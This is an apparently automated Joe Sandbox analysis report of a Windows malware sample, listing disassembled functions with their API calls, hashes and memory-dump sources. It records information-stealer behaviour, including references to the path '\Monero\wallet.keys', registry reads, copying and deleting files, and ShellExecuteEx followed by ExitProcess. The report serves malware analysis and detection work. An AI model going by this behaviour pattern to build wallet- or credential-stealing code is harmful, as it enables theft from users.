                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 97e6b3a30a2952cf67cc5fe4c7f8aabc12827a7508bd9c71f9ad01a8f38745c7
                                    • Instruction ID: 6e78d685c8d12dbf8b987746416c7380a92a9b90525219f497b146144c52b597
                                    • Opcode Fuzzy Hash: 97e6b3a30a2952cf67cc5fe4c7f8aabc12827a7508bd9c71f9ad01a8f38745c7
                                    • Instruction Fuzzy Hash: 28115EB2A44209EBDB14CF95ED49FBFBBB8FB48B14F104259F605A7280D77458009BA2
                                    Function 00099260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrStrA.SHLWAPI(00D3F008,?,?,?,0009140C,?,00D3F008,00000000), ref: 0009926C
                                    • lstrcpyn.KERNEL32(002CAB88,00D3F008,00D3F008,?,0009140C,?,00D3F008), ref: 00099290
                                    • lstrlen.KERNEL32(?,?,0009140C,?,00D3F008), ref: 000992A7
                                    • wsprintfA.USER32 ref: 000992C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 0a92012b317c680d6c53b0401e8c9ac34ebd90da366eefed03eedccfa2ffe91f
                                    • Instruction ID: df86f365501934db64641b33b05ace10a5ce835e9c9abfd6e55ed643a7c372f6
                                    • Opcode Fuzzy Hash: 0a92012b317c680d6c53b0401e8c9ac34ebd90da366eefed03eedccfa2ffe91f
                                    • Instruction Fuzzy Hash: 3501937550010CFFCB04DFECD988EAE7BB9EF58358F148248F9099B244C635AA509B91
                                    Function 000812A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000812B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000812BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000812D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000812F5
                                    • RegCloseKey.ADVAPI32(?), ref: 000812FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 64b78107429f73a689f237cb337e5e19aae0f460e4dedc479861fd3482634838
                                    • Instruction ID: 7d006b3fc34906dcd3f97ed2a761d8170b98febb221998c3d0b58e799149703c
                                    • Opcode Fuzzy Hash: 64b78107429f73a689f237cb337e5e19aae0f460e4dedc479861fd3482634838
                                    • Instruction Fuzzy Hash: 1B01CDB9A4020CBBDB14DFE4EC4DFAEB7B8FB48705F108159FA0597280DA759A058B51
                                    Function 00096630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00096663
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00096726
                                    • ExitProcess.KERNEL32 ref: 00096755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 69897c8bd0e75c587de9ae86e314d6ef9e31c6e2fc478cd6361f3a865c417bdd
                                    • Instruction ID: 5068a3c48af066a837e5bfa3ecb44a157c04fabf981fcddf2c17d6b2737fec70
                                    • Opcode Fuzzy Hash: 69897c8bd0e75c587de9ae86e314d6ef9e31c6e2fc478cd6361f3a865c417bdd
                                    • Instruction Fuzzy Hash: BB314FB1D01218ABDB14EB90DC96FDEB778AF04300F404189F30A66192DF746B49DFAA
                                    Function 000987C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000A0E28,00000000,?), ref: 0009882F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00098836
                                    • wsprintfA.USER32 ref: 00098850
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 51fc1c880ead9c8b72d052df01df006b059c443a8d0685ca38d1e37b32abf42b
                                    • Instruction ID: 879a9f0c313e59f4581bea3ae116c8b1263dd94774be4561b54cd162b332f8b6
                                    • Opcode Fuzzy Hash: 51fc1c880ead9c8b72d052df01df006b059c443a8d0685ca38d1e37b32abf42b
                                    • Instruction Fuzzy Hash: 6F210DB1E44208AFDB04DFD4ED49FAEBBB8FB49715F104219F605A7290C779A901CBA1
                                    Function 00098D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0009951E,00000000), ref: 00098D5B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00098D62
                                    • wsprintfW.USER32 ref: 00098D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: d5357653e6c0044a628c738429191ab1f5131ae15703216ae668bc014dd009e2
                                    • Instruction ID: 19472a941a6435e7f3fb3319c938c7fb8a8618dd243d754d66cad4a99d0d7e6c
                                    • Opcode Fuzzy Hash: d5357653e6c0044a628c738429191ab1f5131ae15703216ae668bc014dd009e2
                                    • Instruction Fuzzy Hash: FAE08CB0A4020CBBD700DBD4EC0EE6DB7B8EB0470AF000195FE0987280DA719E008B96
                                    Function 0008A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D3EEF0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008A2E1
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0008A3FF
                                    • lstrlen.KERNEL32(00000000), ref: 0008A6BC
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                    • DeleteFileA.KERNEL32(00000000), ref: 0008A743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: a254debb05e908b7fd19d9a590751c41f68b651aa77a52c8cb1d3d3f26ea5866
                                    • Instruction ID: 0951a69f88985f8cc737806bacd5365ea56854e4ac75fe9c43b6514d6420fe25
                                    • Opcode Fuzzy Hash: a254debb05e908b7fd19d9a590751c41f68b651aa77a52c8cb1d3d3f26ea5866
                                    • Instruction Fuzzy Hash: 74E1CC72A201189BDF05FBA4EC96EEE7338BF15300F508159F51676092EF306A4DDBA6
                                    Function 0008D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D3EEF0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008D481
                                    • lstrlen.KERNEL32(00000000), ref: 0008D698
                                    • lstrlen.KERNEL32(00000000), ref: 0008D6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0008D72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: d29c07259d55355d42f0dae2e47215566039dcde89dd2e05873ace5e9027a032
                                    • Instruction ID: ee45d612faf7cadd3d3a8838ef3ec733ddccce63551cc7cb03936c3a6fd22d2e
                                    • Opcode Fuzzy Hash: d29c07259d55355d42f0dae2e47215566039dcde89dd2e05873ace5e9027a032
                                    • Instruction Fuzzy Hash: 4391FE72A101189BDF04FBA4ED96EEE7338BF15304F504169F517A6092EF346A09DBA2
                                    Function 0008D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D3EEF0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008D801
                                    • lstrlen.KERNEL32(00000000), ref: 0008D99F
                                    • lstrlen.KERNEL32(00000000), ref: 0008D9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0008DA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 023b283c35af119896501a62402d2f16bd8e9baf5325127574e4770984287ccd
                                    • Instruction ID: f7339bb11165456b1b673d0d827a205b40c1856f36a8095c4cc1f9cd384d5e44
                                    • Opcode Fuzzy Hash: 023b283c35af119896501a62402d2f16bd8e9baf5325127574e4770984287ccd
                                    • Instruction Fuzzy Hash: CE81E072A201189BDF04FBA4DD96EEE7338BF15304F504519F507A6092EF346A09DBE2
                                    Function 0008F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                      • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                      • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                      • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                      • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                      • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                      • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
